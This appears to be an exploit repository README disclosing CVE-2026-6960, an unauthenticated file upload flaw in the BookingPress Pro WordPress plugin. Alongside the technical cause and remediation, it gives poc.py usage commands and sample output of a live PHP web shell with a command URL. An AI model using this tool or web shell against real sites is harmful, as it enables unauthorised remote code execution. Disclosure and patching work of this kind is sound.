Share
## https://sploitus.com/exploit?id=F76E2DDB-D056-5DC1-A339-48C68FAA568B
# CVE-2026-6960 โ€” BookingPress Pro โ‰ค 5.6 | Unauthenticated Arbitrary File Upload

![CVE](https://img.shields.io/badge/CVE-2026--6960-critical?style=flat-square&color=red)
![CVSS](https://img.shields.io/badge/CVSS-9.8-critical?style=flat-square&color=darkred)
![CWE](https://img.shields.io/badge/CWE-434-orange?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None-red?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.7%2B-blue?style=flat-square)

> **Research by:** [Atomic Edge](https://atomicedge.io)
> **Severity:** Critical | **CVSS:** 9.8 | **Auth Required:** None

---

## Overview

A critical unauthenticated arbitrary file upload vulnerability exists in the **BookingPress Pro** WordPress plugin (versions โ‰ค 5.6). The vulnerable function `bookingpress_validate_submitted_booking_form_func` processes signature field uploads without any file type or MIME type validation, allowing an unauthenticated attacker to upload a PHP web shell and achieve **Remote Code Execution (RCE)**.

| Property        | Detail                                              |
|-----------------|-----------------------------------------------------|
| **Plugin**      | BookingPress Pro (bookingpress-appointment-booking-pro) |
| **Affected**    | โ‰ค 5.6                                               |
| **Fixed In**    | 5.7                                                 |
| **Vector**      | Network / Unauthenticated                           |
| **CWE**         | CWE-434: Unrestricted Upload of File with Dangerous Type |

---

## Proof of Concept

### Requirements

```bash
pip install requests
```

### Usage

```bash
# Basic usage
python3 poc.py -u https://target.com

# Custom shell filename
python3 poc.py -u https://target.com -f myshell.php

# Skip SSL verification (self-signed certs)
python3 poc.py -u https://target.com --no-verify
```

### Example Output

```
[*] Target  : https://target.com
[*] Endpoint: https://target.com/wp-admin/admin-ajax.php
[*] Payload : shell.php
[*] Sending upload request...

[+] HTTP Status : 200
[โœ“] Shell is LIVE!
    Output of 'id': uid=33(www-data) gid=33(www-data) groups=33(www-data)

[โ†’] Access your shell: https://target.com/wp-content/uploads/bookingpress/shell.php?cmd=
```

---

## Technical Details

The vulnerability resides in the AJAX handler for `bookingpress_validate_submitted_booking_form`. The signature custom field accepts file uploads but performs **no validation** on:

- File extension (`.php`, `.phtml`, etc.)
- MIME type (`image/png` is trusted as-is from the request)
- File content (no magic byte verification)

Uploaded files are stored in a **web-accessible directory**, making direct execution trivial.

---

## Remediation

Plugin developers should apply the following fixes in `bookingpress_validate_submitted_booking_form_func`:

1. Use `wp_check_filetype_and_ext()` to validate extension and MIME type
2. Restrict allowed types to `image/png`, `image/jpeg`, `image/svg+xml`
3. Rename uploaded files to strip executable extensions
4. Consider storing uploads outside the web root

**โ†’ Update to BookingPress Pro 5.7 immediately.**

---

## Disclaimer

> This repository is intended for **authorized security research and educational purposes only**.
> Do not use this tool against any system without **explicit written permission** from the system owner.
> Unauthorized use may violate the CFAA (USA), Criminal Code s.342.1 (Canada), EU NIS2 Directive, and other applicable laws.
> The authors accept **no liability** for misuse or damages arising from this code.